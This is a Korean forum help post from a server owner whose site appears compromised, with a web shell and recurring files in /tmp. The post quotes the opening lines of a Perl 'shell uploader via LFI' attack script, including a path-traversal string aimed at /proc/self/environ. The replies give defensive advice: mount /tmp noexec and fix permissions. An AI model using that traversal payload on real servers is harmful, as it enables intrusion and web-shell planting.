몇일전부터 계속 서버해킹이 되는거같은데 아이구...ㅡㅜ
10일경인가 home.php라는 이상한 파일이생겨서 들여다봤더니 웹쉘인듯하더군요.
일단 지우고 업체통해 점검받았는데 별다른 문제는 없다는 대답...
그날이후부터 2M안쪽이던 수신트래픽이 맥시멈까지 자주 올라가네요..
/tmp 쪽에는 지우면 계속 파일이 생겨나구요.
txt파일인데 대충 내용이
#!/usr/bin/perl -w
# Simple Shell Uploader via LFI Bugz
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
if (@ARGV != 3) { print "\n [!] perl $0 <host> <path> <bug>\n"; exit(); }
$host = $ARGV[0];
$path = $ARGV[1];
$lfibug = $ARGV[2];
$environ = '../../../../../../../../../../../../../../../proc/self/environ%00';
뭐 이런식입니다..
이거 서버업체에서 여러차례 점검을해도 못잡아내던데...해결방법이 있나요?
의뢰를 해서라도 어떻게든 해결을 하고싶습니다 ㅡㅜ
|
댓글을 작성하시려면 로그인이 필요합니다.
로그인
댓글 2개
아무나 쓸수 있다는 것 때문이죠.
이런거는 서버를 내려두고 원인이 되는 파일을 순수 손으로 찾아내야합니다.
tmp에서 실행 못시키게 하면됩니당....
/etc/fstab 에 보시면 해당 폴더들 실행권한을 줄수가 있는데요....
LABEL=/tmp /tmp ext3 defaults,noexec,nosuid
요렇게만 해줘도 실행안되고, id또한 만들 수 없습니다.
급한대로 요렇게 한번 설정해보시구요....
웹셀 업로드를 해놨다는건... 웹취약성중에서 특히 퍼미션 문제가 가장 큽니다.
업로드되어진 해당폴더 퍼미션 조정을 한번 해보세여.....